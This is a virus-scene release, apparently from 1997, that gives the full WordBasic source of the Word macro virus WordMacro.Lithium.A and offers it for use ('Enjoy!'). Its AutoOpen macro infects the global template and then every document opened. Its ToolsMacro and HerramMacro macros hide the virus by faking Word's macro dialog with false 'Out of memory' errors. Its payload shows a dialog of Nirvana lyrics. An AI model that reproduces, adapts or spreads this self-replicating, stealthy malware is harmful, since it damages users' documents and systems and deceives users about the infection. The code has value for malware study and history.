WordMacro.Lithium.A
~~~~~~~~~~~~~~~~~~~

I'm so happy 
Cause today I found my friends 
They're in SLAM!! :-)

	     DarkSide1 [SLAM]

			    Author : DarkSide1 
			  Origin : Lima-Peru l997 
			     Size : 5029 bytes 
			   Number Macros : Six 
			      Encripted : Yes 
			       Stealth : Yes 
			     Multiversion : Yes 
			    Multiplatform : Yes 
			 

The code is here :-)
Enjoy!

***********************************************
*   Macro  : AutoOpen                         *  
*   Comment: the body of macrovirus :-)       *
*            spread when open the doc         *
***********************************************
=========begin macro==========================
Sub MAIN
'WM.Lithium.A dedicated to memory of Kurt Cobain
'(c)1997 by DarkSide1 in Lima Peru
spreadnow
End Sub

Sub spreadnow
On Error Goto Kurtcobain
Nv$ = FileName$()
    Ao$ = ":AutoOpen"
    Hm$ = ":HerramMacro"
    Tm$ = ":ToolsMacro"
    Ap$ = ":ArchivoPlantillas"
    Ft$ = ":FileTemplates"
    Lt$ = ":Lithium"
   gAo$ = "Global:AutoOpen"
   gHm$ = "Global:HerramMacro"
   gTm$ = "Global:ToolsMacro"
   gAp$ = "Global:ArchivoPlantillas"
   gFt$ = "Global:FileTemplates"
   gLt$ = "Global:Lithium"
	contador = CountMacros(0)
	instalado = 0
	If contador > 0 Then
		For i = 1 To contador
	  'Hey Lithium is a good song of Nirvana...
	  'Find it in cool album Nevermind ;)
			If MacroName$(i, 0) = "Lithium" Then
	  'DarkSide1 is happy with this song ;)
				instalado = 1
			End If
		Next
	End If
	If instalado = 0 Then
MacroCopy Nv$ + Ao$, gAo$, 1
MacroCopy Nv$ + Lt$, gLt$, 1
MacroCopy Nv$ + Hm$, gHm$, 1
MacroCopy Nv$ + Tm$, gTm$, 1
MacroCopy Nv$ + Ft$, gFt$, 1
MacroCopy Nv$ + Ap$, gAp$, 1
	Else
contador = CountMacros(1)
	instalado = 0
	If contador > 0 Then
		For i = 1 To contador
			If MacroName$(i, 1) = "Lithium" Then
				instalado = 1
			End If
		Next
	End If
	If instalado = 0 Then
FileSaveAs .Name = Nv$, .Format = 1
MacroCopy gAo$, Nv$ + Ao$, 1
MacroCopy gLt$, Nv$ + Lt$, 1
MacroCopy gHm$, Nv$ + Hm$, 1
MacroCopy gTm$, Nv$ + Tm$, 1
MacroCopy gFt$, Nv$ + Ft$, 1
MacroCopy gAp$, Nv$ + Ap$, 1
	End If
End If
If Rnd() < 0.3 Then
Call Lithium
End If
Kurtcobain:
End Sub
=========end macro============================




***********************************************
*   Macro  : FileTemplates                    *  
*   Comment: for word english version         *
***********************************************
=========begin macro==========================
Sub MAIN
Call Lithium
End Sub
=========end macro============================




***********************************************
*   Macro  : ArchivoPlantillas                *  
*   Comment: for word spanish version         *
*            the same macro to FileTemplates  *
***********************************************
=========begin macro==========================
Sub MAIN
Call Lithium
End Sub
=========end macro============================




***********************************************
*   Macro  : Lithium                          *  
*   Comment: Show my tribute to Kurt Cobain   *
***********************************************
=========begin macro==========================
Sub MAIN
On Error Goto Endlg
Beep
Dim Pdlg As UserDialog
msg0$ = "It's my little tribute to Kurt Cobain about his song LITHIUM of Nirvana's Nevermind Album ;)"
msg1$ = " I'm so happy / Cause today I found my friends / They're in my head"
msg2$ = " I'm so ugly / That's ok, cause so are you / Broken mirrors"
msg3$ = " Sunday morning / Cause everyday for all I care/ And I'm not scared"
msg4$ = " Light my candles / In a daze cause I found god"
yeaa$ = " Yeaa  (X bunch of times)"
msg5$ = " I'm so lonely / That's ok, I shaved my head / And I'm not sad"
msg6$ = " And just maybe / I'm to blame for all I've heard / And I'm not sure"
msg7$ = " I'm so excited / I can't wait to meet you there /And I don't care"
msg8$ = " I'm so horny / That's ok, my will is good"
msg9$ = " I like it / I'm not gonna crack / I miss you / I'm not gonna crack"
msg10$ = " I love you / I'm not gonna crack / I killed you / I'm not gonna crack"
msg11$ = " I like it / I'm not gonna crack / I miss you / I'm not gonna crack"
msg12$ = " I love you / I'm not gonna crack / I killed you / I'm not gonna crack"
darkside1$ = "DarkSide1 without a computer is like Billy The Kid Without a gun!! ;-)"
Begin Dialog UserDialog 800, 300, "Dear  Word  User...  Congratulations!!  ;-)  It's  WordMacro.Lithium.A  by  DarkSide1"
 Text 125, 10, 600, 50, msg0$
 Text 155, 36, 600, 50, msg1$
 Text 155, 48, 600, 50, msg2$
 Text 155, 60, 600, 50, msg3$
 Text 155, 72, 600, 50, msg4$
 Text 155, 96, 600, 50, yeaa$
 Text 155, 120, 600, 50, msg5$
 Text 155, 132, 600, 24, msg6$
 Text 155, 144, 600, 36, msg7$
 Text 155, 156, 600, 36, msg8$
 Text 155, 180, 600, 50, yeaa$
 Text 155, 204, 600, 36, msg9$
 Text 155, 216, 600, 36, msg10$
 Text 155, 228, 600, 36, msg11$
 Text 155, 240, 600, 36, msg12$

PushButton 100, 270, 570, 24, darkside1$
End Dialog

Redim Pdlg As UserDialog
Dialog Pdlg
Endlg:
End Sub
=========end macro============================




***********************************************
*   Macro  : ToolsMacro                       *  
*   Comment: Stealth in word english version  *
***********************************************
=========begin macro==========================
Sub MAIN
On Error Goto Jeje
B$ = "Out of memory."
C$ = "WordBasic Err = 7"
Dim ComboBox1$(0)                       
ComboBox1$(0) = ""       
Dim ListBox1$(0)
ListBox1$(0) = ""        
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot(Global Template)"
		     
A:
Begin Dialog UserDialog 442, 320, "Macro"       
 CancelButton 290, 38, 141, 21                
 PushButton 290, 14, 141, 21, "Rec&ord...", .D2
					    
 PushButton 290, 72, 141, 21, "&Run", .D3      
 PushButton 290, 97, 141, 21, "&Create", .D4   
 PushButton 290, 125, 141, 21, "&Delete", .D5  
 PushButton 290, 161, 141, 21, "Or&ganizer...", .D6    
 ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1    
 Text 6, 223, 93, 13, "Macros &Available In:", .T1     
  Text 7, 259, 109, 13, "Description:", .T2            
  Text 7, 7, 93, 13, "&Macro Name:", .T3
 ListBox 7, 276, 425, 38, ListBox1$(), .LB1            
						       
 DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2
End Dialog                              

Redim dlg As UserDialog             
 x = Dialog(dlg)
Select Case x
 Case 0          
  Cancel       
 Case 1
  MsgBox B$, C$, 48
  Goto A
 Case 2  
  MsgBox B$, C$, 48                     
  Goto A
 Case 3
  MsgBox B$, C$, 48
  Goto A
 Case 4
  MsgBox B$, C$, 48
  Goto A
 Case 5
  Call Lithium
 End Select
Jeje:
End Sub
=========end macro============================




***********************************************
*   Macro  : HerramMacro                      *  
*   Comment: Stealth in word spanish version  *
*            the same macro to ToolsMacro     *
***********************************************
=========begin macro==========================
Sub MAIN
On Error Goto Jeje :
B$ = "Falta de Memoria"
C$ = "WordBasic Err = 7"
Dim ComboBox1$(0)                       
ComboBox1$(0) = ""       
Dim ListBox1$(0)
ListBox1$(0) = ""        
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot (Plantilla Global)"
		     
A:
Begin Dialog UserDialog 442, 320, "Macros"       
 CancelButton 290, 38, 141, 21                
 PushButton 290, 14, 141, 21, "G&rabar...", .D2
					    
 PushButton 290, 72, 141, 21, "&Ejecutar", .D3      
 PushButton 290, 97, 141, 21, "&Crear", .D4   
 PushButton 290, 125, 141, 21, "&Borrar", .D5  
 PushButton 290, 161, 141, 21, "&Organizador...", .D6    
 ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1    
 Text 6, 223, 193, 13, "M&acros disponibles en:", .T1     
  Text 7, 259, 109, 13, "Descripci¢n:", .T2            
  Text 7, 7, 193, 13, "&Nombre de la Macro:", .T3
 ListBox 7, 276, 425, 38, ListBox1$(), .LB1            
						       
 DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2
End Dialog                              

Redim dlg As UserDialog             
 x = Dialog(dlg)
Select Case x
 Case 0          
  Cancel       
 Case 1
  MsgBox B$, C$, 48
  Goto A
 Case 2  
  MsgBox B$, C$, 48                     
  Goto A
 Case 3
  MsgBox B$, C$, 48
  Goto A
 Case 4
  MsgBox B$, C$, 48
  Goto A
 Case 5
  Call Lithium
End Select
Jeje:
End Sub
=========end macro============================

